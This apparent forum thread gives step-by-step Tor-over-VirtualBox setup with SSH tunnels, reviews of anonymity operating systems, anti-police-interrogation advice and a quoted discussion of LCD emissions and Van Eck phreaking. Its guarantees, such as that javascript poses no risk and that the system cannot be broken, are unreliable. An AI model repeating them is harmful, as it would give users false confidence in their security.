After a minute or so, you should be back to your VirtualBox Manager, with neither virtual machine running.

1. Right click on "Primary, Powered Off" and go to "Settings"

2. Select "Network" from the menu on the left.

3. Next to "Attached to" is a pull down menu. Right now it is set to "NAT". Choose "Internal Network" and click "Ok"

4. Click "Firewall" to highlight it, and then click on "Snapshots (1)" in the top right.

5. Right click on "Snapshot 1" and then select "Restore Snapshot". Select "Restore" if prompted.

6. Right click "Firewall" and click "Start"

Now your Firewall will be resumed exactly where it had been previously set up. The last command entered should still be visible.

Before you proceed, make sure that TOR is running on your main Windows computer. If it is, you will see an "Onion" icon visible in your task bar. Click on that icon and you should see the "Vidalia Control Panel". Make sure that it says "Connected to the TOR Network". If so, you are ready to proceed. If not then please see section 2 : "Using and Testing Tor Browser for the first time" to re-start TOR. Once TOR is running, proceed.

Let's restart Ubuntu:

7. Right click "Primary" and click Start. Log in as normal.

8. After fully logged in, open "Firefox" by clicking the orange "Firefox" logo at the top, next to "System".

9. Try to go to any website, such as http://www.google.com. Try at least 3-5 different websites. You should not be able to connect to any of them.

Note: If you attempt to go to websites you have already been to using Ubuntu, they may appear to load because they are cached.

10. In Firefox on Ubuntu, go to "Edit" and "Preferences"

11. Click on the "Advanced" icon

12. Click on the "Network" tab

13. Under "Connection" it says "Configure how Firefox connects to the internet". To the right of that is a "Settings" button. Click that button.

14. Select "Manual proxy configuration"

15. Next to both "HTTP Proxy" and "SSL Proxy" type in: 127.0.0.1

16. Set the port to 8118 for both "HTTP Proxy" and "SSL Proxy"

17. Next to "SOCKS Host" type: 127.0.0.1

18. Set the port for "SOCKS Host" to 9050

19. Make sure that "SOCKS v5" is selected at the bottom.

20. Click "Ok" and then "Close"

Now we have instructed Firefox to use TOR. However, Firefox cannot use TOR yet. Right now, Ubuntu is completely unable to connect to the Internet. We
are going to change that.

21. Go to "Applications" -> "Accessories" -> "Terminal"

22. Type in: sudo bash (and hit enter)

23. Type in your password if prompted.

24. Type in the following commands exactly as shown below (or copy paste them):

ifconfig eth0 10.0.3.2
/etc/init.d/polipo stop
/etc/init.d/tor stop
/etc/init.d/privoxy stop

(Note: the last three commands, those beginning with /etc/ are only necessary if you installed Torchat)

Now you have told your Ubuntu machine to join the same network that your Firewall is on. Now we can establish a tunnel for TOR data to flow from our Ubuntu machine, through the Firewall, into your Windows guest machine. We need to establish two such tunnels.

The first tunnel for port 9050 data, and the second tunnel for port 8118 data. When these two tunnels are set up, it will be possible for you to use your Ubuntu machine to access any website using TOR. Further, it is still completely impossible for your Ubuntu machine to access the Internet in any other way.

25. Your terminal window should still be open. Type in the following command exactly as shown (or copy paste it):

ssh -N -L 9050:10.0.2.2:9050 root@10.0.3.1

26. Type "yes" if prompted. When prompted for the password, give your Firewall password. Not your Ubuntu password.

After you hit enter, you will see the cursor go to a blank line and nothing else happens. This simply means the connection you requested is active. If the connection were to stop for any reason, you would return to a command prompt. If you want to terminate the connection yourself, simply hit CTRL+C. You can type in the same ssh command again if you need to re-open the tunnel.

27. Now we are going to open the second tunnel. In your terminal window, go to "File" and "Open Tab". This will open up a tab for a second terminal without affecting the first.

28. Now, type exactly as shown below to open the second tunnel:

ssh -N -L 8118:10.0.2.2:8118 root@10.0.3.1

29. Return to Firefox. Go to the "File" menu and uncheck "Work Offline" if it is checked.

30. Go to the URL: http://check.torproject.org

If you see the text: "Congratulations. Your browser is configured to use Tor" then you are all set! Your Ubuntu virtual machine is now NOT connected to the
internet in any way. However, you can browse any website using TOR, even Youtube. You do not have to be afraid of javascript or Flash. Any files you save
onto your virtual machine will automatically be saved in the encrypted truecrypt volume you set up earlier. In fact, everything the virtual machine does will be contained within that truecrypt volume.

Further, even if someone somehow managed to remotely gain full root access to your Ubuntu machine (absurdly unlikely to happen), they would still not be able to see *anything* about who you are, or what your real IP address is, or even that you are using a Virtual Machine. To them, it would appear that the Ubuntu machine is your main computer. They would be totally unable to compromise your identity based on this alone.

However, keep the following in mind. If someone were to gain access to your Ubuntu machine, they WOULD be able to see anything you have used it for or any files you have saved. Therefore, I recommend for the sake of absolute security, do not store anything on your Ubuntu virtual machine that identifies you. This is just a precaution. It is virtually impossible that someone would manage to remotely gain access to your Ubuntu machine.

Next:17. General Daily Usage ===

=== 17. General Daily Usage ===

Much of this guide has involved detailed one-time setup processes. From now on, all you have to do when you want to use TOR from your Ubuntu virtual machine is to follow these steps. Every step listed is a step you have already done, so feel free to re-visit earlier sections if you need help.

1. Start TrueCrypt, and mount your hidden volume which contains your virtual machine.

2. Start VirtualBox

3. Start TorBrowser Bundle.

4. Click "Firewall" to highlight it, and then click on "Snapshots (1)" in the top right.

5. Right click on "Snapshot 1" and then select "Restore Snapshot". Select "Restore" if prompted.

6. Right click "Firewall" and click "Start"

7. Right click "Primary" and click Start. Log in as normal.

8. Go to "Applications" -> "Accessories" -> "Terminal"

9. Type in: sudo bash (and hit enter)

10. Type in your password if prompted.

11. Type in the following commands exactly as shown below (or copy paste them):

ifconfig eth0 10.0.3.2
/etc/init.d/polipo stop
/etc/init.d/tor stop
/etc/init.d/privoxy stop

(Note: the last three commands, those beginning with /etc/ are only necessary if you installed Torchat)

12. Your terminal window should still be open. Type in the following command exactly as shown (or copy paste it):

ssh -N -L 9050:10.0.2.2:9050 root@10.0.3.1

13. Type "yes" if prompted. When prompted for the password, give your Firewall password. Not your Ubuntu password.

14. In your terminal window, go to "File" and "Open Tab".

15. Now, type exactly as shown below to open the second tunnel:

ssh -N -L 8118:10.0.2.2:8118 root@10.0.3.1

16. Return to Firefox. Go to the "File" menu and uncheck "Work Offline" if it is checked.

17. Go to the URL: http://check.torproject.org

If you see the text: "Congratulations. Your browser is configured to use Tor" then you are all set!

Enjoy!

Phew, now i have it complete ! I admit its quite extensive, not to say enourmous, but its the best how-to on anonymity and other safety procedures i have found so far. It secures your sys black-hat style^^ :

http://en.wikipedia.org/wiki/Black_Hat_Briefings (for those of you who dont know black hat ^^)

You dont have to do all steps at once. You can do a little of it every time you have an hour or two to spare. I think for the whole procedure you will need roughly 8-12 hours. I think its written in a way everybody should be able to follow. If there are still steps unclear just ask, i will see if i can help you. btw this is written for noobs, but the tips here are interesting for allmost everybody.

P.S.: Once you have installed TOR you can get access to TOR hidden services and other interesting deep-web pages. If you want some links for your first steps into this hidden part of the internet just ask me. If there is a lot of requests i will write an extra thread with the most important websites in the deepweb. One thing before you get started : most deepweb pages arent online 24/7. So if you cant reach a certain website be patient and try again and again till you get access. Another thing : you will find websites that are pretty shocking and disturbing. In 99.5% you will see beforehand what you find on those sites, so if you dont want to see certain things dont klick on the links.

Now that you have a really secure system, you should know what to do when the shit hits the fan and you are arrested or your home gets searched. SYour system, is secured in a way they cant break, so the only thing that can incriminate you now is your testimony.
These 2 youtube videos are 2 lectures on behaviour towards the police in such situations. Part one is done by a criminal defense attorney, part 2 by a very experienced police officer. They both tell you about the tricks the police uses and how you should react :





;tl,dw : say nothing and ask for a lawyer, ALLWAYS ! You cannot improve your situation with anything you say (this is counterintuitive, but the attorney here has in his whole carrer NEVER heared of single case where a suspect could help his case by talking to the police, but he could name many cases where they made matters way worse) but you can make it a lot worse, so shut the hell up and wait for your lawyer.

Even him being a defense lawyer wouldnt talk to the police under any circumstances. You can tell your story before court AND NEVER, UNDER NO CIRCUMSTANCES, BEFORE THAT ! Even the cop in lecture 2 says NEVER TALK TO THE POLICE !!!!!

#OpShitSorm

NO©
☢☠☢

Share by MasterPirate™ ✔

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #7 
You can also use TORBOX AKA WHONIX- a full operating system (OS)--two virtual machines masking your identity.
This is not just a program for privacy--it is a complete operating system...




http://www.hacker10.com/internet-anonymity/anonymous-operating-system-whonix/

Anonymous operating system Whonix
Posted on 26 September, 2012 by Hacker10
Share

Whonix is an anonymous operating system based on Virtual Box, Debian Linux and tor proxy, Whonix consists of two virtual machines, one dedicated to run a tor proxy acting as a gateway and the second one called Whonix-Workstation located in a completely isolated network. The system has been designed to make IP and DNS leaks impossible, not even malware with root access will be able to find out your computer IP, all Internet connections are forced through tor, including applications that do not support proxy settings, this is done using the firewall settings. It is possible to use Whonix with a VPN or SSH tunnel if needed, hardware serial numbers are also hidden. Any operating system able to run VirtualBox can run Whonix, this includes Windows, Mac, Linux, BSD and Solaris.

Disadvantages of running Whonix are that it will be very slow to update your operating system though tor, it is more difficult to set up than the tor browser bundle and your computer should have a good amount of RAM and modern CPU to run VirtualBox. Whonix advantages are that unlike an anonymous live CD like Tails or Liberté Linux data will be available after reboot due to persistent storage, you can install your favourite software packages using Debian’s packaging tool apt-get, the applications will be torified straight away, you can also save virtual machine snapshots saving a clean one for data recovery if needed.
VirtualBox setting up Whonix operating system

VirtualBox setting up Whonix operating system

Many Whonix default applications come configured to avoid fingerprinting, GPG software for example will not reveal your operating system version and XChat comes with the default torified set up as described in the tor project Wiki.

In countries where you can be forced to disclosure your full encryption password Whonix can help with plausible deniability if you hide the .ova virtual machine file inside a hidden encrypted container with Truecrypt or store the virtual machine inside a fully encrypted USB thumbdrive that will look like random data to forensics software.

Note: Development is ongoing, this is an Alpha release.

Visit Whonix homepage

Anonymous operating system Whonix
Posted on 26 September, 2012 by Hacker10
Share

Whonix is an anonymous operating system based on Virtual Box, Debian Linux and tor proxy, Whonix consists of two virtual machines, one dedicated to run a tor proxy acting as a gateway and the second one called Whonix-Workstation located in a completely isolated network. The system has been designed to make IP and DNS leaks impossible, not even malware with root access will be able to find out your computer IP, all Internet connections are forced through tor, including applications that do not support proxy settings, this is done using the firewall settings. It is possible to use Whonix with a VPN or SSH tunnel if needed, hardware serial numbers are also hidden. Any operating system able to run VirtualBox can run Whonix, this includes Windows, Mac, Linux, BSD and Solaris.

Disadvantages of running Whonix are that it will be very slow to update your operating system though tor, it is more difficult to set up than the tor browser bundle and your computer should have a good amount of RAM and modern CPU to run VirtualBox. Whonix advantages are that unlike an anonymous live CD like Tails or Liberté Linux data will be available after reboot due to persistent storage, you can install your favourite software packages using Debian’s packaging tool apt-get, the applications will be torified straight away, you can also save virtual machine snapshots saving a clean one for data recovery if needed.
VirtualBox setting up Whonix operating system

VirtualBox setting up Whonix operating system

Many Whonix default applications come configured to avoid fingerprinting, GPG software for example will not reveal your operating system version and XChat comes with the default torified set up as described in the tor project Wiki.

In countries where you can be forced to disclosure your full encryption password Whonix can help with plausible deniability if you hide the .ova virtual machine file inside a hidden encrypted container with Truecrypt or store the virtual machine inside a fully encrypted USB thumbdrive that will look like random data to forensics software.

Note: Development is ongoing, this is an Alpha release.

Visit Whonix homepage
https://github.com/adrelanos/Whonix
Related Posts:

Anonymous Internet surfing with Liberté Linux
Secure operating system Qubes OS
Anonymous web surfing with The Amnesic Incognito Live System

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #8 
More anon operating systems reviewed by my sIStErs iN rEvOlUtiON at hacker10.com

http://www.hacker10.com/tag/anonymous-operating-system/

Anonymous Internet surfing with Liberté Linux
Posted on 16 May, 2012 by Hacker10
Share

Liberté Linux review

Liberté Linux is a small (220MB) Gentoo based secure oriented distribution available as a live CD, live USB thumbdrive, installable or Open Virtualization Bundle (.ova) compatible with Virtualbox and VMWare. This operating system enables people to anonymously communicate with others via chat (Pidgin+OTR, XChat) or email and browse the Internet using tor, it supports new and old hardware, including 3G modems, Bluetooth and experimental UEFI booting.

Openbox is the default window manager, from there you can configure your mouse, keybindings, timezone, etc. You will find security software like the open source Figaro password manager and GNU Privacy Assistant (GPA) to manage encryption keys together with tools to read text (ePDFViewer, FBReader), listen to audio (Audacious), watch videos (Movie Player), edit images(Geeqie) and a task manager displaying CPU and RAM. Liberté Linux keep its size small replacing bloated software with lightweight tools that do not carry unnecessary features, for example instead of using LibreOffice to edit text it comes with Abiword.
Liberté Linux Anonymous operating system

Liberté Linux Anonymous operating system

The wireless network card MAC address is randomly changed at boot time, the only thing Liberté Linux asks the user to enter is a passphrase during installation in order to create a LUKS compatible encrypted storage space using otfe (On-the-fly encryption) where persistent user data will be stored in /mnt/boot/otfe/liberte.vol using a paranoid 8192 RSA key that will take a couple of minutes to generate. The user is automatically logged in as “anon“, if you need to be root, and it is never a good idea to browse the Internet as root, the root password is “liberte“, entering “gentoo=root” during boot will also unlock it.

Epiphany is the default browser, leaner than Firefox, it comes with HTML5 support, you shouldn’t need flash to view online videos in YouTube, the browser has been configured to surf the Internet through tor, including links to The Hidden Wiki, Wikileaks and Torcheck on the main page to get you started. The Florence virtual keyboard allows the user to enter text using the mouse, a good way to bypass hardware keyloggers in public computers, RAM memory is wiped when you power off the system to stop cold boot attacks.

Liberté Linux is pioneering the use of Cable Communications for anonymous email exchange, achieved giving the user a cryptic .onion and .i2p address that functions as personal email address, it requires some configuration in Claws email to use it. Message delivery can take hours or days and you will get a delivery receipt once the message reaches the recipient.
Liberté Linux Florence virtual keyboard

Liberté Linux Florence virtual keyboard

It is possible to run a stand alone VPN or PPTP using the network manager and tor-resolve in console mode, you can run Liberté Linux inside Windows too but I would not advice it as IMHO it weakens your privacy. I have used other Linux distributions for anonymous Internet surfing, like Tails and OccupyOS and I have decided to adopt Liberté Linux as my default distro for secure communications, I find it more suitable for me because it is more lightweight, it comes with detailed documentation, it creates an encrypted storage space for user data and exists the option to disable tor in case I need to login into Paypal or any similar site blocking proxies.

I don’t think you will be disappointed with this operating system. If you are wondering why it does not include Truecrypt I suspect that it might have to do with the fact that Truecrypt is not released under the standard Linux GPL license and this can be a problem. However, you can create your own encrypted containers from command line with otfe.

Visit Liberté Linux homepage

Posted in Internet Anonymity | Tagged anonymous Linux live CD, anonymous operating system, Liberté Linux review, Linux live CD with tor, Linux Tails alternative | Leave a reply
OccupyOS anonymous operating system for activists
Posted on 5 December, 2011 by Hacker10
Share

OccupyOS review

OccupyOS is a live CD distribution based on Gentoo Linux and inspired by the occupy Wall Street movement, it has been designed to allow activists from all over the world to anonymously edit and publish documents on the web, as well as managing Twitter and Facebook accounts, securely communicating with other activists while bypassing any ISP Internet filter, this is accomplished using tor or a VPN for web browsing and general internet access, encrypted voice chat using Mumble, encrypted instant messenger with Pidgin-OTR (Off The Record Plugin) and Xchat with OTR for anonymous IRC chat, MAC address changer to stop others from linking your computer network card with ISP logs , VNC to remotely connect to other computers, OpenSSH, OpenSSL, sfdisk to manage disk partitions and The Gimp to edit images.

You can also use this Linux distribution to directly trash your hard disk beyond recovery using DBAN, instead of having a pile of CDs, OccupyOS comes with additional tools that can be selected at boot time, like DBAN, a Windows NT password and registry editor and FreeDOS , an open source DOS compatible operating system for IBM-PC systems that should work with old hardware.
OccupyOS anonymous Linux distro

OccupyOS anonymous Linux distro

It doesn’t look as if OccupyOS has reinvented the wheel, it pretty much overlaps Tails, a better established live CD for anonymous internet browsing, but it might have a couple of utilities that Tails doesn’t have, it could come in handy if for some reason Tails does not work in your computer. OccupyOS roadmap includes adding a reactive firewall (a reactive firewall has the ability to react to malicious hacking attempts whereas passive firewalls only alert the user and logs the attempt), using Samhain, a file integrity utility to check system changes, implementing low power boot up mode, finding an email client supporting GnuPG encryption and others.

Note: This distribution is still in development, you can only download a beta version for testing.

Visit OccupyOS homepage

Posted in Internet Anonymity | Tagged alternative to TAILS Linux distro, anonymous live CD, anonymous operating system, Linux distribution with tor, Linux distro for activist, LInux distro to wipe data, live CD with tor, occupyOS Linux, occupyOS review, secure Linux distribution, security live CD, TAILS linux alternative | Leave a reply
Anonymous web surfing with The Amnesic Incognito Live System
Posted on 18 April, 2011 by Hacker10
Share

Surf the Internet anonymously

Tails, short for The Amnesic Incognito Live System, has Ad-block preinstalled on its Iceweasel (Firefox based) browser, it comes with many other privacy enhancing tools to stop companies and repressive Governments tracking down Internet users.

This Debian based Linux live CD enables you to hide your IP address while surfing the Internet, it comes preconfigured to use the anonymous tor network for all outgoing connections, this will hide your IP at all times, you do not need to know anything about Linux to use it, just download the ISO file burn it to a CD, reboot your computer, MAC or PC, and it will work straight out of the box.

Anonymous live CD features

Supports mobile broadband devices like 3G USB dongles
Can be booted up from a USB thumbdrive instead of a live CD
Multilingual support including Arabic, Chinese and Spanish in between other languages
Firewall drops incoming packets by default
Instant Messenger Pidgin comes with the OTF messaging plugin to proxy communications through tor
Internet browser comes with the HTTPS Everywhere, FireGPG and Ad-block extensions
Stops cold boot attacks by wiping RAM memory on shutdown
Virtual keyboard available to stop keyloggers
Support for i2p eepsites, hidden websites hosted anonymously
Email client ClawsMail comes with GnuPG support to encrypt email messages

The Amnesic Incognito Live System

The Amnesic Incognito Live System

Live CD with encryption & file deletion

The Amnesic Incognito Live System includes secure-delete integrated on its file manager, a program to wipe free disk space and sensitive files, a front end encryption key manager called SeaHorse will take care of digital signatures and GPG encryption keys.

If you are comfortable with Linux command line you can take advantage of cryptsetup to encrypt files and macchanger to change your computer MAC address. Those are only the security features, open source everyday software for production purposes includes OpenOffice.org to edit documents, The Gimp to edit photos, Audacity to edit sound files and many others.

This operating system to hide your IP address has two preconfigured users: amnesia and root, the password is the same for both of them, amnesia.

Visit The Amnesic Incognito Live System homepage

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #9 
You know you have problems when you are breaking out the tin foil


http://www.schneier.com/blog/archives/2012/12/friday_squid_bl_357.html#c1052218

Sruce Bchneier • December 22, 2012 1:06 AM

TEMPEST Attacks! LCD Monitor leaks system noise to FRS
=
I don't operate any wireless equipment at my living location. This includes computers, computer equipment, routers, non-computer equipment, etc.

I'm having a problem with one of my LCD monitors.

It works without problems. That was until I picked up some heavy static noises from a hand held radio. I eliminated all sources of generating this type of noise until I came towards an LCD monitor. When the monitor is on and there is content on the screen the radio makes several types of garbage(static) sounds. As I manipulate contents on the screen, maximize and minimize windows, open different applications, the radio responds with scratchy(static) noises to match the activity on the screen. This includes typing and mouse movement.

When I switched the desktop background to a solid black color without wallpaper, the radio noise went down to almost nothing. But when I loaded any program with a white background, the noise from the radio exploded in volume.

When I passed the radio across different computer and non-computer electronic devices other than the LCD monitor, the wired mouse made a high pitched squeal sound within the static. None of the other computing devices such as the tower generated any noise.

I tried CRT monitors and separate computers attached to the CRT monitors but they did not generate any noise in the radio. On the computer connected to the net, I unplugged the cable leading to the router to rule this out but it made no difference, the LCD monitor is at fault.

While monitoring the radio noise, there were several instances where the noise on the channel being monitored stopped, and I switched to another channel and the same noise appeared. Why would the noise from the LCD switch channels during normal use of the LCD? Back and forth throughout the day the noise generated by the LCD would switch from one channel to the next and back to the first channel again.

The noise extends several steps within my living location. I'll test this another day to determine if it extends outside my living location and if so by how many feet.

The computer/monitor are grounded and attached to a surge protector. I'm not sure what I need to do to stop this, or if I should ignore it.

I assumed LCDs would be quieter than CRTs when it came to noise.

Unless I have a radio tuned to a specific channel, the LCD does not generate any noise which I can detect, unless it's above my hearing capacity.

The LCD monitor also functions as speakers, and while the sound cable is connected to the tower, I have disabled the onboard sound in my BIOS. The only other connection is the DVI cable to the tower.

How may I decrease this noise or eliminate it? It seems like the LCD is a mini radio station. When I turn it off the noise in the radio stops, if I blacken the screen the noise lessens. When I switch to a colorful background or load white screened applications like a web browser the noise jumps up loudly. I've tried grabbing and moving a browser window around the screen and the movement matches the noises in the radio.

Would any of this be considered normal?
==-
This certainly isn't unheard of, it's because some part of the monitor is unshielded. The more fix-it stuff is at the top of the following, with the technical backdrop that just might be good to know is at the bottom.

Unfortunately, the issue is most likely the panel charging the LCs. The only thing you can do is see if the manufacturer will replace it or upgrade you. Complain to the manufacturer, be sure to come up with some important thing it's interfering with(if I recall some medical devices use some sort of radio).

If the issue is actually internal wiring which is highly unlikely as detailed below, and it isn't in warranty, attempt to shield it yourself. To shield it yourself, you'll need thin foil(not kitchen foil) and electrical tape.

So, in any given monitor, there's 3 main parts. Input, logic, and output. Output, as previously mentioned, can't really be shielded. To shield both of the other sections, all you really need to do is manipulate the wiring to reduce the number of holes in the foil wrap needed to put it all back together. Obviously this will take some trial and error, and time.


USEFUL INFO THAT ISN'T REQUIRED:

Shielding wires can best be thought of as a encasing a wire in a Faraday cage, made of foil. If you want to see an example, Apple's iPod charging cords are all shielded, strip the insulation and see for yourself. This shielding acts doubly, keeping EM noise from messing with the signal, and keeps the signal's own noise from leaving.

WHY IT IS THE CHARGING PANEL AND NOT WIRING:
Because of the specific details you provided( bravo to you, the amount of data provided helped ), I can conclude that the charging panel(the array of electrodes responsible for producing the image) is putting out the interference. Three of your observations prove this.

First, you state the noise ceases completely when the monitor is turned off, which is consistent with it being EM noise.
Second, the noise's perceived pitch changes when the display is manipulated, which is to be expected, as the electrode charges would change as the display changes.
Third, a black screen is "quieter" than a white screen. Black is the lowest charge state, with the only power in use going to the backlight.

As for your questions:
Noise hopping channels isn't unheard of, though I don't know the science behind it. My best guess is that because the noise isn't an intended result of the electricity, small changes in voltage/amperage result in those hops.
(indirect question-ish) The mouse was likely the only other emitter because it has a fairly high density of wires + it emits light.
===-
@W00t:

What 1s the d1fference between - and where may 1 obta1n the non-k1tchen "foil" you ment1oned?

The d1sturbances sound l1ke a bugged env1ronment. The squeal com1ng from one area and/or dev1ce could mean the locat1on of the bug has been found - and 1 know adding a small dev1ce and/or mod1f1cation to a keyboard and/or mouse 1s s1mple enough - espec1ally for a quick 1n and out the door type bugging.

1s there an affordable method of sh1elding the equ1pment while not violating FCC/TEMPEST laws? Would a simple screen d1mmer attached to the monitor bring the no1se down? Or would 1t be best to put out the extra money requ1red by purchas1ng spec1al paint or wallpaper wh1ch blocks RF signals?

Whether or not 1t's a bug, at this point you are broadcast1ng your computer mon1tor and 1ts activ1t1es, down to the keyboard and mouse movements. What 1s the use of using Tor or any other l1ke serv1ce 1f you are pwned over the a1r waves?
====-
You could use kitchen foil, it's just more unwieldy to work with.

Yes, it could be a bug, I was running under the assumption you had no reason to believe you were bugged, and if you did you ran bug sweeps. If you believe you are bugged, you should definitely dismantle things to make sure a bug isn't simply piggybacking on the same power source.

Dimming the screen would reduce noise, but not completely eliminate it.
=====-
Thanks, W00t.

"Dimming the screen would reduce noise, but not completely eliminate it."

I have modified my browser to function with a black background and my choice of text colors and unchecked the option for all pages to use their own colors, so every page I visit is black with my choice of font/links colors. I'll rescan to determine if this lessens the noise. It's ugly, but tolerable. Coupled with a black theme for the desktop, including the background and system wide applications should also help - including disabling images in the browser.

You mentioned foil. I'm not an electrician, but wouldn't wrapping cords with foil and finishing the job off with a layer of strong black tape possibly conduct electricity? Are you suggesting I cover all wires leading to the computer(s) using this method? Wouldn't they each require special grounding? How many repeating layers of this and/or other material is needed? Have you tried "conductive tubing?"

While I want to shield enough to block noisy RF, I don't want to create a microwave type scenario where RF is contained but it still remains and is possibly amplified so as to add to the degeneration of my health, if that's possible.

1. Ferrite beads
2. Split beads
3. Toroids

CONDUCTIVE TUBING & FERRITE SNAP BEAD
http://www.lessemf.com/wiring.html

https://en.wikipedia.org/wiki/Electromagnetic_interference
https://en.wikipedia.org/wiki/Electromagnetic_radiation_and_health
https://en.wikipedia.org/wiki/Electromagnetic_shielding
https://en.wikipedia.org/wiki/EMF_measurement

I could try some or all of the three options above in addition to your advice? TY
===-
Anyways this reminding me of Van Eck phreaking look it up, some pretty interesting stuff.

Yep, had the same thought.

Countermeasures are detailed in the article on TEMPEST, the NSA's standard on spy-proofing digital equipment. One countermeasure involves shielding the equipment to minimize electromagnetic emissions. Another method, specifically for video information, scrambles the signals such that the image is perceptually undisturbed, but the emissions are harder to reverse engineer into images. Examples of this include low pass filtering fonts and randomizing the least significant bit of the video data information.
====-
can someone please point me to techie LCD monitor internal guides? If I'm going to take it apart I'd like to know what to expect. I've read more about Van Eck and Tempest than anyone can teach me here. Now I'm looking for LCD guides of what's inside.
===-
To be honest, its not the whats inside the LCD monitor you should be worrying about if you want to phreak LCD's . You should be worry more about the RF side of things, and figuring out the spread spectrum clock signal so you can pick up the signal. Top if off background noise is going to be bitch when it comes to LCD. Old CRT monitors are way easier to phreak those thing throw off EM radiation like nobody business.
===-
The noise coming from the LCD monitor is appearing on FRS channels:

- https://en.wikipedia.org/wiki/Family_Radio_Service

It continues for several minutes before it jumps to another channel then after a few minutes jumps back to the original channel. One of my concerns is the ability for others to pluck this noise from the air (Van Eck/TEMPEST) and monitor my activity, or possibly use an attack against the computer somehow. A recent UN report mentioned a high tech method(s):

* U.N. report reveals secret law enforcement techniques

"Point 201: Mentions a new covert communications technique using software defined high frequency radio receivers routed through the computer creating no logs, using no central server and extremely difficult for law enforcement to intercept."

- http://www.unodc.org/documents/frontpage/...
- http://www.hacker10.com/other-computing/...

In addition, I don't want my LCD monitor constantly sending monitor and/or system activity to a FRS channel(s) for others to hear. I choose wired over wireless for a reason, and there shouldn't be any noise coming from my LCD monitor and appearing over FRS, unless there is a bug or problem with the monitor. All of my
CRT systems are silent on FRS.

When I position the radio near different components, the power supply doesn't emit any noise on FRS, but it could be a problem, I don't know, I'll move to that once I resolve the LCD monitor problem, unless the PSU is the problem and not the monitor.

I may take apart the LCD monitor, I'm looking for a good list of what I'll find if I do.

I peered inside the vents on the top/back left hand side with a strong flashlight and came across a strange piece of silver tape inside, here's how I describe it:

OOGGGGGGGGGGGGGGG__

OO = a small thin black material coming out from underneath the silver piece of tape
GG = the strip of silver tape
__ = the bottom right hand portion of the silver tape is raised enough to allow a pinky finger entry

The silver tape/material/opening under tape is on the top left corner inside the monitor. The rest of the length and area inside that I can see contain no tape or black material. I've seen photos of planted bugs in people's living spaces and most if not all of the invasive ones are wrapped/covered in silver foil. I've found no other reason for that strip and material to be there, but what do I know.
=====
In addition, my CDROM drive light blinks once every second, sometimes with a second or 1/2 second in between, and I found this:

http://catless.ncl.ac.uk/Risks/19.60.html#subj9

"I'd worry about a Tempest virus that polled a personal computer's
CD-ROM drive to pulse the motor as a signalling method:

* Modern high-speed CD-ROM drive motors are both acoustically and
electrically noisy, giving you two attack methods for the price of one;

* Laptop computer users without CRTs, and the PC users that can afford
large LCD screens instead of CRTs, often have CD-ROM drives;

* Users are getting quite used to sitting patiently while their
CD-ROM drives grind away for no visibly obvious reason (but
that's quite enough about the widespread installs of software from
Microsoft CD-ROMs that prompted Kuhn's investigation in the first place.)"
===-
I don't think there should be anymore blinking if you remove the CD/DVD inside.
If it keeps blinking, find out which process uses it.
Anyway, you can disable it when you're not using it, if it's bothering you.

And shield your monitor.
http://en.wikipedia.org/wiki/...
====-
"I don't think there should be anymore blinking if you remove the CD/DVD inside."

Does Tails support this at boot?

If not, is there a Linux LiveCD which allows this and does not give you root access at boot?

I've looked at several different distributions which allow you to boot into RAM and remove the CD, but they all give you root and that's a very insecure environment to run TBB in!

"If it keeps blinking, find out which process uses it."

It doesn't blink on the several distros which boot into RAM, but I don't want to run Tor as root or reconfigure the permissions/PAM/etc. just to use TBB. As above, with Tails and many LiveCDs which don't boot into RAM, 99% of them have this blinking light issue. The actual INSTALLS I've done to HDD experience constant light activity too, even more so, without anything to explain them.

For Linux, I've ran rkhunter, chkrootkit, tiger, and other tools and nothing malicious is found. Without a deep binary analysis I don't know what else I could do.

For Windows, I use a few programs in the SysInternals Suite and they display strange usage on the system and reference programs which cannot be found with a search on the system, references to impersonation, spoofing, and more. I've ran almost every N.American scanner on the Windows systems, including command line only rootkit detectors and I've seen some strange 'strings' of binaries mentioned, but have no idea on how to clean the system.

I prefer to run LiveCDs because all installations, Windows and Linux, contain unexplainable frenzies of blinking lights, far worse than the blink every second on most LiveCDs. I'm wondering if this is firmware malware on my NIC or the CDROM itself. This has existed for years and never goes away, no matter what system I use, this strange baggage seems to re-infect everything.

"Anyway, you can disable it when you're not using it, if it's bothering you."

Disable what?

"And shield your monitor."

Thanks. I'm investigating and most of the guides require specific addons to the computer's cabling system. Most of the guides appear incomplete, or are in another language other than English.

Any comments on the Tempest/blinking light possibility?

Any comments on why it's spewing out noise to FRS stations and freq hopping?
===-
More comments from elsewhere:

@kb2vxa:

"You're making a mountain out of a mole hill."

I respect your opinion and I don't wish to argue against it, but please look at it from the way I and some others have. I want to eliminate the noise created by the LCD monitor. If this was such a common experience, I would expect at least one of the dozens of other electronic equipment to generate some noise, however faint, on FRS - but they do not.

